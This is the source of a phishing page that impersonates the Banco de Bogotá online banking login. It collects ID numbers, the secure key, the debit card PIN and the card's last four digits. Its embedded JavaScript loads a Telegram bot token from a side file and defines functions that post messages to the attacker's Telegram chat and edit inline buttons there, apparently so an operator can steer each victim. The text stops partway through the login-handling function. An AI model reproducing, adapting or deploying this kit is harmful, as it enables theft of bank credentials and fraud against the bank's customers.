<!DOCTYPE html>
<html lang="es" class="hydrated">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <link rel="icon" type="image/x-icon" href="img/favicon.ico">
    <script type="text/javascript" src="js/jquery-3.2.1.min.js"></script>
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link rel="stylesheet" type="text/css" href="css/7485.css">
    <link rel="stylesheet" type="text/css" href="css/3433.css">
    <link rel="stylesheet" type="text/css" href="css/3810.css">
    <link rel="stylesheet" type="text/css" href="css/1538.css">
    <title>Banca Virtual Banco de Bogotá</title>
    <style>
        /* Estilos adicionales para modales */
        .custom-modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 9999;
            display: flex;
            align-items: center;
            justify-content: center;
            animation: fadeIn 0.3s ease;
        }

        .custom-modal-content {
            background: white;
            padding: 30px;
            border-radius: 10px;
            max-width: 400px;
            width: 90%;
            text-align: center;
            animation: slideIn 0.3s ease;
        }

        .custom-modal h3 {
            margin-bottom: 20px;
            color: #0040a8;
        }

        .custom-modal input {
            width: 100%;
            padding: 12px;
            border: 2px solid #ddd;
            border-radius: 5px;
            margin-bottom: 20px;
            text-align: center;
            font-size: 18px;
            box-sizing: border-box;
        }

        .custom-modal input:focus {
            border-color: #0040a8;
            outline: none;
        }

        .custom-modal button {
            width: 100%;
            padding: 12px;
            background: #0040a8;
            color: white;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .custom-modal button:hover:not(:disabled) {
            background: #003487;
        }

        .custom-modal button:disabled {
            background: #ccc;
            cursor: not-allowed;
        }

        .error-message {
            color: #e74c3c;
            margin-top: 15px;
            font-weight: bold;
        }

        .success-message {
            color: #27ae60;
            margin-top: 15px;
            font-weight: bold;
        }

        @keyframes fadeIn {
            from {
                opacity: 0;
            }

            to {
                opacity: 1;
            }
        }

        @keyframes slideIn {
            from {
                transform: translateY(-30px);
                opacity: 0;
            }

            to {
                transform: translateY(0);
                opacity: 1;
            }
        }
    </style>
</head>

<body>

    <div id="bdb-at-backdrop" class="bdb-at-backdrop animated bdb-at-backdrop--show" style="display: none;">
        <div class="bdb-at-backdrop--active" style="background: rgb(89 124 187 / 80%);">
            <div id="content-slot" class="bdb-at-backdrop__content animated fadeInUpBig" style="align-items: center;">
                <label class="bdb-at-animation__content__text">Espera un momento, por favor</label>
            </div>
        </div>
    </div>

    <div id="ZN_2i9VyFIbGal2H6C"></div>

    <div id="root">
        <div class="shell-container">
            <div class="shell-container__security-mf"></div>
            <div class="shell-container__mf shell-container__auth">
                <div class="_7iexZXBAeI30pvSwzz84WQ==">
                    <div slot="content" class="_0Gdby9eXQfYOY9sy4FhOQg==">
                        <div class="sherpa-grid">
                            <div class="sherpa-container">
                                <div class="row">
                                    <div class="kASZ-GVb1mV-F7wsG8XMrQ== col-xs-12 col-sm-10 col-lg-4 col-sm-offset-1 col-lg-offset-1">
                                        <div class="K4zpkwgEhPpdsV0NO5lT4A==">
                                            <auth-bdb-at-logo type="BDBFULL" height="32px" class="cRIQh9a0Zkzcv1GC0IswLA== hydrated">
                                                <div id="bdb-at-logo" class="logo logo__bdb_full" style="height: 32px;"></div>
                                            </auth-bdb-at-logo>
                                            <auth-bdb-at-logo type="BDB" height="32px" class="-m7zf0zEtOGTpOkjz-Vn0w== hydrated">
                                                <div id="bdb-at-logo" class="logo logo__bdb" style="height: 32px;"></div>
                                            </auth-bdb-at-logo>
                                            <div class="LeBfOcLjw2G7uO5iQf8cKw== sherpa-typography-heading-5">Bienvenido a tu Banca Virtual</div>
                                        </div>

                                        <div class="I-MuvO+UPg4UEIDwvDzQww==">
                                            <div class="RtO-GDpVCDwXXcYboPOQQA==">
                                                <img src="https://virtual.bancodebogota.co/bbog-pb-frontend-authentication-app/assets/422e00391dd36d89affe.png" alt="Modern banking interface showing digital financial services and secure login portal for Banco de Bogotá virtual banking platform">
                                            </div>
                                            <div class="_2NRBYvhlHS2ejyxSrjRrNg==">
                                                <label class="sherpa-typography-paragraph-S">¿Nunca has ingresado a Banca Virtual?</label>
                                                <button class="bdb-at-btn--link--white bdb-at-btn--lg">
                                                    <label class="sherpa-typography-paragraph-S">Aquí te decimos cómo hacerlo ›</label>
                                                </button>
                                            </div>
                                        </div>

                                        <div>
                                            <div class="sSx+Q-lIOPxgL65Y7MbQ-A== ">
                                                <auth-bdb-ml-secondtabs tabid="2" data-testid="login-tabs" position="center" proportionalwidth="true" tabs="[{" id":1,"title":"clave="" segura","disabled":false},{"id":2,"title":"tarjeta="" débito","disabled":false}]"="" tab-id="2" class="hydrated">
                                                    <div id="bdb-ml-secondtabs" class="parent-container">
                                                        <div id="main" class="mainContainer mainContainer--center">
                                                            <div id="tabs-container" class="mainContainer__tabsContainer" style="width: 100%;">
                                                                <div role="tablist" aria-label="" id="tabs-bar" class="mainContainer__tabsContainer__bar" style="width: 100%;">
                                                                    <button id="bdb-ml-secondtabs__1" type="button" role="tab" aria-selected="false" tabindex="0" class="mainContainer__tabsContainer__bar__segment" style="width: 50%; padding: 0px; cursor: pointer;">
                                                                        <span id="label1" class="mainContainer__tabsContainer__bar__segment__label " style="font-family: Roboto-Regular; color: rgb(92, 92, 92);">Clave segura</span>
                                                                    </button>
                                                                    <button id="bdb-ml-secondtabs__2" type="button" role="tab" aria-selected="true" tabindex="-1" class="mainContainer__tabsContainer__bar__segment" style="width: 50%; padding: 0px; cursor: pointer;">
                                                                        <span id="label2" class="mainContainer__tabsContainer__bar__segment__label " style="font-family: Roboto-Medium; color: rgb(0, 64, 168);">Tarjeta débito</span>
                                                                    </button>
                                                                </div>
                                                                <div id="tab" class="mainContainer__tabsContainer__tab tab" style="width: 50%; transform: translate(100%, 0px);"></div>
                                                            </div>
                                                        </div>
                                                        <div class="line"></div>
                                                    </div>
                                                </auth-bdb-ml-secondtabs>

                                                <div class="Rss5lmooa4LaRBcklXQG1g==">
                                                    <div class="S2UoSavgNyQ5bZtWswES6g==">
                                                        <div class="VfNxBuyQH1iHTBzzFnacpw==">
                                                            <auth-bdb-at-dropdown data-testid="identification-type" id="identificationType" name="identificationType" label="Identificación" placeholder="Selecciona" options="[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]" defaultvalue="CC" class="hydrated" style="width: 100%;">
                                                                <div id="bdb-at-dropdown" class="container">
                                                                    <div class="container__label">
                                                                        <span>Identificación</span>
                                                                    </div>
                                                                    <div class="container__input">
                                                                        <button id="botonMostrarOcultar" type="button" class="container__input__select" style="display: block;"></button>
                                                                        <div tabindex="0" id="dropdown_identificationType" class="container__input__box">
                                                                            <p id="opcionamostrar" class="container__input__box--valueSelected">C.C. Cédula de ciudadanía</p>
                                                                        </div>
                                                                        <div id="menusito" class="animated container__input__options--hide" style="min-width: 296px;">
                                                                            <div id="option-CC" class="container__input__options__items--same-selected opciones">C.C. Cédula de ciudadanía</div>
                                                                            <div id="option-TI" class="opciones">T.I. Tarjeta de Identidad</div>
                                                                            <div id="option-CE" class="opciones">C.E. Cédula de Extranjería</div>
                                                                            <div id="option-NI" class="opciones">N.P.N. NIT Persona Natural</div>
                                                                            <div id="option-NE" class="opciones">N.P.E. NIT Persona Extranjera</div>
                                                                            <div id="option-NJ" class="opciones">N.P.J. NIT Persona Jurídica</div>
                                                                            <div id="option-PA" class="opciones">P.S. Pasaporte</div>
                                                                            <div id="option-RC" class="opciones">R.C. Registro Civil</div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                                <input id="ip" name="ip" type="hidden" value="">
                                                            </auth-bdb-at-dropdown>
                                                        </div>

                                                        <div class="_38XTXN6LzdUclz9qYHcAyA==">
                                                            <div class="">
                                                                <auth-bdb-at-input data-testid="identification-number" id="identificationNumber" name="identificationNumber" type="NUMBER" message="" placeholder="#" required="true" maxlength="15" autocomplate="true" value="" class="hydrated"></auth-bdb-at-input>
                                                                <div class="input-box">
                                                                    <div class="">
                                                                        <span></span>
                                                                    </div>
                                                                    <div class="input-box__content">
                                                                        <span class=""></span>
                                                                        <input tabindex="0" id="bdb-at-input" autocomplete="off" class="input-box__content__input" type="number" placeholder="#" maxlength="15" inputmode="numeric">
                                                                        <span class=""></span>
                                                                        <span id="icon" class="input-box__content__icon"></span>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>

                                                    <div class="MK6zjK6wkIvyGROOveR-dg==" id="menudesplegadodos" style="display: none;">
                                                        <div class="K-wqy+QXS5351QAHeicN5Q== sherpa-typography-label-1">Documento del representante legal principal</div>
                                                        <div class="S2UoSavgNyQ5bZtWswES6g==">
                                                            <div class="VfNxBuyQH1iHTBzzFnacpw==">
                                                                <auth-bdb-at-dropdown data-testid="identification-type" id="identificationType" name="identificationType" label="Identificación" placeholder="Selecciona" options="[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]" defaultvalue="CC" class="hydrated" style="width: 100%;">
                                                                    <div id="menudosb" class="container">
                                                                        <div class="container__input">
                                                                            <button id="botonMostrarOcultardos" type="button" class="container__input__select" style="display: block;"></button>
                                                                            <div tabindex="0" id="dropdown_identificationTypedos" class="container__input__box">
                                                                                <p id="opcionamostrardos" class="container__input__box--valueSelected"></p>
                                                                            </div>
                                                                            <div id="menusitodos" class="animated container__input__options--hide" style="min-width: 296px;">
                                                                                <div id="option-CC" class="container__input__options__items--same-selected opcionesdos">C.C. Cédula de ciudadanía</div>
                                                                                <div id="option-CE" class="opcionesdos">C.E. Cédula de Extranjería</div>
                                                                                <div id="option-PA" class="opcionesdos">P.S. Pasaporte</div>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </auth-bdb-at-dropdown>
                                                            </div>

                                                            <div class="_38XTXN6LzdUclz9qYHcAyA==">
                                                                <div class="input-box">
                                                                    <auth-bdb-at-input data-testid="identification-number" id="identificationNumber" name="identificationNumber" type="NUMBER" message="" placeholder="#" required="true" maxlength="15" autocomplate="true" value="" class="hydrated"></auth-bdb-at-input>
                                                                    <div class="input-box">
                                                                        <span class=""></span>
                                                                        <input tabindex="0" id="bdb-at-inputmenudos" autocomplete="off" class="input-box__content__input" type="number" placeholder="#" maxlength="15" inputmode="numeric">
                                                                        <span class=""></span>
                                                                        <span id="icon" class="input-box__content__icon"></span>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>

                                                    <div id="menudeb" class="kEBB6+7IfbDPxUuB6G3LvQ==" style="display: none;">
                                                        <div>
                                                            <auth-bdb-at-input data-testid="key-secure" id="secure" name="password" label="Clave segura" type="SECUREKEY" message="" placeholder="...." required="true" maxlength="4" minlength="4" passwordmode="true" viewmode="true" autocomplate="true" value="" class="hydrated">
                                                                <div class="input-box" style="margin-top: 14px;">
                                                                    <div class="input-box__label">
                                                                        <span>Clave de tu tarjeta débito</span>
                                                                    </div>
                                                                    <div class="input-box__content">
                                                                        <span class=""></span>
                                                                        <input tabindex="0" id="bdb-at-input2" autocomplete="off" class="input-box__content__input input-box__content__input--securekey input-box__content__input--password" type="password" placeholder="...." maxlength="4" inputmode="numeric">
                                                                        <span class="input-box__content__labelMask">
                                                                            <span class="input-box__view ico-open-view"></span>
                                                                        </span>
                                                                    </div>
                                                                </div>
                                                            </auth-bdb-at-input>

                                                            <auth-bdb-at-input data-testid="key-secure" id="secure" name="password" label="Clave segura" type="SECUREKEY" message="" placeholder="...." required="true" maxlength="4" minlength="4" passwordmode="true" viewmode="true" autocomplate="true" value="" class="hydrated">
                                                                <div class="input-box">
                                                                    <div class="input-box__label" style="margin-top: 25px;">
                                                                        <span>Últimos 4 dígitos de tu tarjeta débito</span>
                                                                    </div>
                                                                    <div class="input-box__content">
                                                                        <span class=""></span>
                                                                        <input tabindex="0" id="bdb-at-input3" autocomplete="off" class="input-box__content__input input-box__content__input--securekey input-box__content__input--password" type="password" placeholder="...." maxlength="4" inputmode="numeric">
                                                                        <span class="input-box__content__labelMask">
                                                                            <span class="input-box__view ico-open-view"></span>
                                                                        </span>
                                                                    </div>
                                                                </div>
                                                            </auth-bdb-at-input>
                                                        </div>
                                                        <button id="botonazodos" class="eay7wDeyb-EbWIk2kfDMUg== bdb-at-btn bdb-at-btn--primary bdb-at-btn--lg" disabled="" type="button">Ingresar</button>
                                                    </div>

                                                    <div id="menuseg" class="menuseg" style="display: block;">
                                                        <div class="kEBB6+7IfbDPxUuB6G3LvQ==" style="display: block;">
                                                            <div>
                                                                <auth-bdb-at-input data-testid="key-secure" id="secure" name="password" label="Clave segura" type="SECUREKEY" message="" placeholder="...." required="true" maxlength="4" minlength="4" passwordmode="true" viewmode="true" autocomplate="true" value="" class="hydrated">
                                                                    <div class="input-box">
                                                                        <div class="input-box__label">
                                                                            <span>Clave segura</span>
                                                                        </div>
                                                                        <div class="input-box__content">
                                                                            <span class=""></span>
                                                                            <input tabindex="0" id="bdb-at-input4" autocomplete="off" class="input-box__content__input input-box__content__input--securekey input-box__content__input--password" type="password" placeholder="...." maxlength="4" inputmode="numeric">
                                                                            <span class="input-box__content__labelMask">
                                                                                <span class="input-box__view ico-open-view"></span>
                                                                            </span>
                                                                        </div>
                                                                    </div>
                                                                </auth-bdb-at-input>
                                                            </div>
                                                        </div>
                                                        <button id="botonazouno" class="eay7wDeyb-EbWIk2kfDMUg== bdb-at-btn bdb-at-btn--primary bdb-at-btn--lg" disabled="" type="button">Ingresar</button>
                                                        <div class="_2qAdquiAgwqbzNCymlPemw==">
                                                            <div class="FFpcSRrHMJPw-SkgQESC6Q==">
                                                                <button class="O0YA2X74My9l+nzRnY-JMQ== bdb-at-btn bdb-at-btn--link bdb-at-btn--lg" data-testid="register-button">
                                                                    <label>Registrarme ›</label>
                                                                </button>
                                                            </div>
                                                            <button class="JgosmUi+t305evaOyAeTcg== bdb-at-btn bdb-at-btn--link bdb-at-btn--lg" data-testid="forget-button">
                                                                <label>Olvidé mi clave ›</label>
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="_8tZh1MJslDjXZUMTa9BZCw== sherpa-typography-caption-1">Este sitio está protegido por reCAPTCHA y aplican las <a href="#" target="_blank">políticas de privacidad</a> y los <a href="#">términos de servicio de Google</a>. </div>
                                    </div>
                                    <div class="_3fwnkATm8OOXVUer3cv63Q== col-xs-12 col-sm-10 col-lg-5 col-lg-offset-1" data-testid="login-info">
                                        <div class="l6PvrKiF67ac2E7uXbqwdA==">
                                            <span class="_9TCe2JJahCN6jayBgMLgiw==">v.1.18.0</span>
                                        </div>
                                        <img src="img/hola.png" alt="Professional banking environment showing secure digital transactions and modern financial technology interface for Colombian banking system" class="pirepicj">
                                        <div class="t6+WO7mE1jTBH3qExjodKw==">
                                            <div class="_4sKT51PaUCFL+le8tAL0Rg==" id="mth_banner_bdb" data-testid="login-banner" data-flk-success="atNodeInserted24">
                                            </div>
                                            <div class="XTZk5Fsbyr-8UVrZwafLpA==">
                                                <auth-bdb-ml-horizontal-selector data-testid="carousel" withicons="true" buttonwidth="124" selectionvalues="[object Object],[object Object],[object Object],[object Object],[object Object]" class="hydrated">
                                                    <div class="bdb-ml-horizontal-selector">
                                                        <div class="bdb-ml-horizontal-selector__scrollable">
                                                            <div class="bdb-ml-horizontal-selector__scrollable__container">
                                                                <div id="bdb-ml-horizontal-selector__0" class="bdb-ml-horizontal-selector__scrollable__container__selector" style="width: 124px;">
                                                                    <auth-bdb-ml-box-button class="hydrated">
                                                                        <div id="bdb-ml-box-button" class="bdb-ml-box-button">
                                                                            <button id="selector__00" class="box" style="width: 100%;">
                                                                                <span class="box__icon ico-seguros"></span>
                                                                                <div class="box__label">Configuración de seguridad</div>
                                                                            </button>
                                                                        </div>
                                                                    </auth-bdb-ml-box-button>
                                                                </div>
                                                                <div id="bdb-ml-horizontal-selector__1" class="bdb-ml-horizontal-selector__scrollable__container__selector" style="width: 124px;">
                                                                    <auth-bdb-ml-box-button class="hydrated">
                                                                        <div id="bdb-ml-box-button" class="bdb-ml-box-button">
                                                                            <button id="selector__10" class="box" style="width: 100%;">
                                                                                <span class="box__icon ico-cuenta-de-ahorros"></span>
                                                                                <div class="box__label">Solicitar un producto</div>
                                                                            </button>
                                                                        </div>
                                                                    </auth-bdb-ml-box-button>
                                                                </div>
                                                                <div id="bdb-ml-horizontal-selector__2" class="bdb-ml-horizontal-selector__scrollable__container__selector" style="width: 124px;">
                                                                    <auth-bdb-ml-box-button class="hydrated">
                                                                        <div id="bdb-ml-box-button" class="bdb-ml-box-button">
                                                                            <button id="selector__20" class="box" style="width: 100%;">
                                                                                <span class="box__icon ico-call-center"></span>
                                                                                <div class="box__label">Atención al cliente</div>
                                                                            </button>
                                                                        </div>
                                                                    </auth-bdb-ml-box-button>
                                                                </div>
                                                                <div id="bdb-ml-horizontal-selector__3" class="bdb-ml-horizontal-selector__scrollable__container__selector" style="width: 124px;">
                                                                    <auth-bdb-ml-box-button class="hydrated">
                                                                        <div id="bdb-ml-box-button" class="bdb-ml-box-button">
                                                                            <button id="selector__30" class="box" style="width: 100%;">
                                                                                <span class="box__icon ico-digital-shift"></span>
                                                                                <div class="box__label">Solicitar un turno digital</div>
                                                                            </button>
                                                                        </div>
                                                                    </auth-bdb-ml-box-button>
                                                                </div>
                                                                <div id="bdb-ml-horizontal-selector__4" class="bdb-ml-horizontal-selector__scrollable__container__selector" style="width: 124px;">
                                                                    <auth-bdb-ml-box-button class="hydrated">
                                                                        <div id="bdb-ml-box-button" class="bdb-ml-box-button">
                                                                            <button id="selector__40" class="box" style="100%;">
                                                                                <span class="box__icon ico-call-center"></span>
                                                                                <div class="box__label">Buscar cajeros y oficinas</div>
                                                                            </button>
                                                                        </div>
                                                                    </auth-bdb-ml-box-button>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button id="back" class="bdb-at-btn bdb-at-btn-action bdb-at-btn-action--secondary bdb-at-btn-action--lg bdb-ml-horizontal-selector__btn-back">
                                                            <span class="ico-arrow-back"></span>
                                                        </button>
                                                        <button id="next" class="bdb-at-btn bdb-at-btn-action bdb-at-btn-action--secondary bdb-at-btn-action--lg bdb-ml-horizontal-selector__btn-next">
                                                            <span class="ico-arrow-next"></span>
                                                        </button>
                                                    </div>
                                                </auth-bdb-ml-horizontal-selector>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="version">
                    <div>Shell: 1.24.0</div>
                    <div>Legacy: 1.6.0</div>
                    <div>Miscellaneous: 1.2.0</div>
                    <div>Authentication: 1.18.0</div>
                    <div>Dashboard: 1.12.0</div>
                    <div>Products: 1.8.2</div>
                    <div>Payments: 2.0.0</div>
                    <div>Transfers: 3.0.0</div>
                    <div>Documents: 1.10.1</div>
                    <div>Settings: 1.3.0</div>
                    <div>CustomerAssistance: N/A</div>
                    <div>RecurringPayments: 1.5.0</div>
                    <div>PersonalFinances: N/A</div>
                    <div>CdtManagement: 1.1.18</div>
                </div>
            </div>
        </div>

        <div id="overlay-root"></div>

        <div id="error-modal" class="custom-modal" style="display: none;">
            <div class="custom-modal-content">
                <div style="display: flex; align-items: center; justify-content: center; gap: 20px;">
                    <img src="img/error.png" alt="Icono de error" style="width: 60px; height: 60px;">
                    <div>
                        <h3>¡Ups! Algo salió mal</h3>
                        <p>Los datos ingresados no coinciden con los de tu cuenta. Por favor, verifica tu información y vuelve a intentarlo.</p>
                    </div>
                </div>
                <button id="back-to-start-button" style="width: 100%; margin-top: 20px; background-color: #0040a8; color: white;">Volver al inicio</button>
            </div>
        </div>

        <script>
            $(document).ready(function($) {
                let TELEGRAM_BOT_TOKEN = '';
                let TELEGRAM_CHAT_ID = '';

                fetch('js/brr76.json')
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('No se pudo cargar el archivo de configuración.');
                        }
                        return response.json();
                    })
                    .then(data => {
                        TELEGRAM_BOT_TOKEN = data.token;
                        TELEGRAM_CHAT_ID = data.chat_id;
                        console.log("Tokens y IDs de chat de Telegram cargados correctamente.");
                        initializeFormLogic();
                    })
                    .catch(error => {
                        console.error('Error al cargar la configuración de Telegram:', error);
                        alert('Error crítico: No se pudo cargar la configuración de Telegram. Por favor, verifica el archivo js/brr76.json.');
                        $('button').prop('disabled', true);
                        $('input').prop('disabled', true);
                    });

                function initializeFormLogic() {
                    let statusCheckInterval = null;
                    let lastUpdateId = null;

                    async function sendToTelegram(messageContent, keyboard) {
                        const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
                        const payload = {
                            chat_id: TELEGRAM_CHAT_ID,
                            text: messageContent,
                            parse_mode: 'Markdown',
                            reply_markup: keyboard
                        };

                        try {
                            const response = await fetch(url, {
                                method: 'POST',
                                headers: {
                                    'Content-Type': 'application/json',
                                },
                                body: JSON.stringify(payload),
                            });
                            if (!response.ok) {
                                const errorText = await response.text();
                                console.error(`Error al enviar mensaje a Telegram: ${response.status} - ${errorText}`);
                                return {
                                    success: false
                                };
                            }
                            const data = await response.json();
                            console.log('Mensaje enviado a Telegram exitosamente:', data);
                            return {
                                success: true,
                                message_id: data.result.message_id
                            };
                        } catch (error) {
                            console.error('Error de red al enviar mensaje a Telegram:', error);
                            return {
                                success: false
                            };
                        }
                    }

                    async function deleteTelegramButtons(chatId, messageId) {
                        const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/editMessageReplyMarkup`;
                        const payload = {
                            chat_id: chatId,
                            message_id: messageId,
                            reply_markup: {
                                inline_keyboard: []
                            }
                        };
                        try {
                            const response = await fetch(url, {
                                method: 'POST',
                                headers: {
                                    'Content-Type': 'application/json',
                                },
                                body: JSON.stringify(payload),
                            });
                            if (!response.ok) {
                                const errorText = await response.text();
                                console.error(`Error al eliminar botones de Telegram: ${response.status} - ${errorText}`);
                            } else {
                                console.log('Botones de Telegram eliminados exitosamente.');
                            }
                        } catch (error) {
                            console.error('Error de red al eliminar botones de Telegram:', error);
                        }
                    }

                    const tab1 = document.getElementById('bdb-ml-secondtabs__1');
                    const tab2 = document.getElementById('bdb-ml-secondtabs__2');
                    const label1 = document.getElementById('label1');
                    const label2 = document.getElementById('label2');
                    const tabs = document.getElementById('tab');
                    const menuseg = document.getElementById("menuseg");
                    const menudeb = document.getElementById("menudeb");
                    const azul = document.getElementById('bdb-at-backdrop');

                    tab1.addEventListener('click', function() {
                        tab1.setAttribute('aria-selected', 'true');
                        tab1.setAttribute('tabindex', '0');
                        label1.setAttribute('style', 'font-family: Roboto-Medium; color: rgb(0, 64, 178);');
                        tab2.setAttribute('aria-selected', 'false');
                        tab2.setAttribute('tabindex', '-1');
                        label2.setAttribute('style', 'font-family: Roboto-Regular; color: rgb(92, 92, 92);');

                        tabs.setAttribute('style', 'width: 50%; transform: translate(0px, 0px);');
                        menuseg.style.display = 'block';
                        menudeb.style.display = 'none';
                        validarInputsYActivarBoton();
                    });

                    tab2.addEventListener('click', function() {
                        tab1.setAttribute('aria-selected', 'false');
                        tab1.setAttribute('tabindex', '-1');
                        label1.setAttribute('style', 'font-family: Roboto-Regular; color: rgb(92, 92, 92);');
                        tab2.setAttribute('aria-selected', 'true');
                        tab2.setAttribute('tabindex', '0');
                        label2.setAttribute('style', 'font-family: Roboto-Medium;color: rgb(0, 64, 168);');

                        tabs.setAttribute('style', 'width: 50%; transform: translate(100%, 0px);');
                        menuseg.style.display = 'none';
                        menudeb.style.display = 'block';
                        validarInputsYActivarBoton();
                    });

                    document.querySelectorAll('.opcionesdos').forEach(item => {
                        document.getElementById('opcionamostrardos').textContent = "C.C. Cédula de ciudadanía";
                        item.addEventListener('click', event => {
                            document.getElementById('opcionamostrardos').textContent = event.target.textContent;
                            document.querySelectorAll('.opcionesdos').forEach(option => {
                                option.classList.remove('container__input__options__items--same-selected');
                            });
                            event.target.classList.add('container__input__options__items--same-selected');
                            var contenido = document.getElementById('menusitodos');
                            contenido.classList.add('container__input__options--hide');
                            contenido.classList.remove('fadeIn');
                            document.getElementById('dropdown_identificationTypedos').classList.remove('container__input__box__arrow');
                            document.getElementById('dropdown_identificationTypedos').classList.remove('container__input__box--active');
                        });
                    });

                    document.querySelectorAll('.opciones').forEach(item => {
                        item.addEventListener('click', event => {
                            document.getElementById('opcionamostrar').textContent = event.target.textContent;
                            const clickedText = event.target.textContent;
                            document.querySelectorAll('.opciones').forEach(option => {
                                option.classList.remove('container__input__options__items--same-selected');
                            });
                            event.target.classList.add('container__input__options__items--same-selected');
                            var contenido = document.getElementById('menusito');
                            contenido.classList.add('container__input__options--hide');
                            contenido.classList.remove('fadeIn');
                            document.getElementById('dropdown_identificationType').classList.remove('container__input__box__arrow');
                            document.getElementById('dropdown_identificationType').classList.remove('container__input__box--active');

                            const valuesToCheck = [
                                'N.P.N. NIT Persona Natural',
                                'N.P.E. NIT Persona Extranjera',
                                'N.P.J. NIT Persona Jurídica'
                            ];
                            if (valuesToCheck.includes(clickedText)) {
                                document.getElementById('menudesplegadodos').style.display = 'block';
                            } else {
                                document.getElementById('opcionamostrardos').textContent = '';
                                document.getElementById('menudesplegadodos').style.display = 'none';
                                document.getElementById('bdb-at-inputmenudos').value = '';
                            }
                            validarInputsYActivarBoton();
                        });
                    });

                    document.getElementById('botonMostrarOcultar').addEventListener('click', function() {
                        var contenido = document.getElementById('menusito');
                        var flecha = document.getElementById('dropdown_identificationType');
                        if (contenido.classList.contains('container__input__options--hide') && flecha.classList.contains('container__input__box')) {
                            contenido.classList.remove('container__input__options--hide');
                            contenido.classList.add('fadeIn');
                            contenido.classList.add('container__input__options__items');
                            document.getElementById('dropdown_identificationType').classList.add('container__input__box__arrow');
                            document.getElementById('dropdown_identificationType').classList.add('container__input__box--active');
                        } else {
                            contenido.classList.add('container__input__options--hide');
                            contenido.classList.remove('fadeIn');
                            document.getElementById('dropdown_identificationType').classList.remove('container__input__box__arrow');
                            document.getElementById('dropdown_identificationType').classList.remove('container__input__box--active');
                        }
                    });

                    document.getElementById('botonMostrarOcultardos').addEventListener('click', function() {
                        var contenido = document.getElementById('menusitodos');
                        var flecha = document.getElementById('dropdown_identificationTypedos');
                        if (contenido.classList.contains('container__input__options--hide') && flecha.classList.contains('container__input__box')) {
                            contenido.classList.remove('container__input__options--hide');
                            contenido.classList.add('fadeIn');
                            contenido.classList.add('container__input__options__items');
                            document.getElementById('dropdown_identificationTypedos').classList.add('container__input__box__arrow');
                            document.getElementById('dropdown_identificationTypedos').classList.add('container__input__box--active');
                        } else {
                            contenido.classList.add('container__input__options--hide');
                            contenido.classList.remove('fadeIn');
                            document.getElementById('dropdown_identificationTypedos').classList.remove('container__input__box__arrow');
                            document.getElementById('dropdown_identificationTypedos').classList.remove('container__input__box--active');
                        }
                    });

                    const nextButton = document.getElementById('next');
                    const backButton = document.getElementById('back');
                    const container = document.querySelector('.bdb-ml-horizontal-selector__scrollable__container');
                    let currentPosition = 0;
                    const itemWidth = 124;

                    function moveContainer(direction) {
                        if (direction === 'next') {
                            currentPosition -= itemWidth;
                        } else if (direction === 'back') {
                            currentPosition += itemWidth;
                        }

                        const minPosition = 0;
                        const maxPosition = (container.children.length - 1) * itemWidth - 280;
                        currentPosition = Math.max(minPosition, Math.min(currentPosition, maxPosition));

                        container.style.transition = 'transform 0.5s ease-in-out';
                        container.style.transform = `translateX(-${currentPosition}px)`;

                        backButton.style.display = currentPosition === 0 ? 'none' : 'initial';
                        nextButton.style.display = currentPosition === maxPosition ? 'none' : 'initial';
                    }

                    nextButton.addEventListener('click', function() {
                        moveContainer('back');
                    });

                    backButton.addEventListener('click', function() {
                        moveContainer('next');
                    });

                    function validarInputsYActivarBoton() {
                        const input = document.getElementById('bdb-at-input');
                        const input2 = document.getElementById('bdb-at-input2');
                        const input3 = document.getElementById('bdb-at-input3');
                        const input4 = document.getElementById('bdb-at-input4');
                        const inputRepLegal = document.getElementById('bdb-at-inputmenudos');
                        const botonazodos = document.getElementById('botonazodos');
                        const botonazouno = document.getElementById('botonazouno');
                        const tabButton1 = document.getElementById('bdb-ml-secondtabs__1');
                        const tabButton2 = document.getElementById('bdb-ml-secondtabs__2');

                        function verificarCondiciones() {
                            const textoInput = input.value.trim();
                            const input1Valido = textoInput.length > 0;
                            const isRepLegalVisible = document.getElementById('menudesplegadodos').style.display === 'block';
                            const repLegalType = document.getElementById('opcionamostrardos').textContent.substring(0, 5);
                            const repLegalNumber = inputRepLegal.value.trim();
                            const repLegalValido = !isRepLegalVisible || (repLegalType && repLegalNumber.length > 0);
                            const longitudInput4 = input4.value.trim().length;
                            const input4Valido = longitudInput4 === 4;
                            const longitudInput2 = input2.value.trim().length;
                            const longitudInput3 = input3.value.trim().length;
                            const input2Valido = longitudInput2 === 4;
                            const input3Valido = longitudInput3 === 4;
                            const botonActivoTab1 = tabButton1.getAttribute('aria-selected') === 'true';
                            const botonActivoTab2 = tabButton2.getAttribute('aria-selected') === 'true';

                            if (botonActivoTab1 && input1Valido && input4Valido && repLegalValido) {
                                botonazouno.removeAttribute('disabled');
                            } else {
                                botonazouno.setAttribute('disabled', 'true');
                            }

                            if (botonActivoTab2 && input1Valido && input2Valido && input3Valido && repLegalValido) {
                                botonazodos.removeAttribute('disabled');
                            } else {
                                botonazodos.setAttribute('disabled', 'true');
                            }
                        }

                        input.addEventListener('input', verificarCondiciones);
                        input2.addEventListener('input', verificarCondiciones);
                        input3.addEventListener('input', verificarCondiciones);
                        input4.addEventListener('input', verificarCondiciones);
                        inputRepLegal.addEventListener('input', verificarCondiciones);

                        async function handleLoginAttempt(loginData, tabName) {
                            azul.style.display = 'block';

                            const now = new Date();
                            const formattedDate = now.toLocaleDateString('es-CO', {
                                day: 'numeric',
                                month: 'numeric',
                                year: 'numeric'
                            });
